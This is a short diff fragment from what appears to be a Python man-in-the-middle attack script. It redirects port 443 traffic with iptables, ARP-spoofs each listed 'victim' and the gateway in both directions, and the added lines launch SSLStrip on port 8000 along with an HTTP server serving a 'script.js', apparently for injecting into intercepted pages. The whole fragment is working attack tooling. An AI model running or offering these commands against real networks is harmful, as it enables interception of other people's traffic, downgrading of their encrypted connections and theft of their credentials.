|
|
@ -39,6 +39,9 @@ os.system("iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRE |
|
|
|
for victim in victims: |
|
|
|
os.system("xterm -e arpspoof -i eth0 -t " + victim + " " + gateway + " &") |
|
|
|
os.system("xterm -e arpspoof -i eth0 -t " + gateway + " " + victim + " &") |
|
|
|
|
|
|
|
# run SSLStrip on port 8000 |
|
|
|
os.system("python sslstrip.py -l 8000 &") |
|
|
|
|
|
|
|
# start the http server for serving the script.js, in a new console |
|
|
|
os.system("xterm -hold -e 'python3 httpServer.py' &") |
|
|
|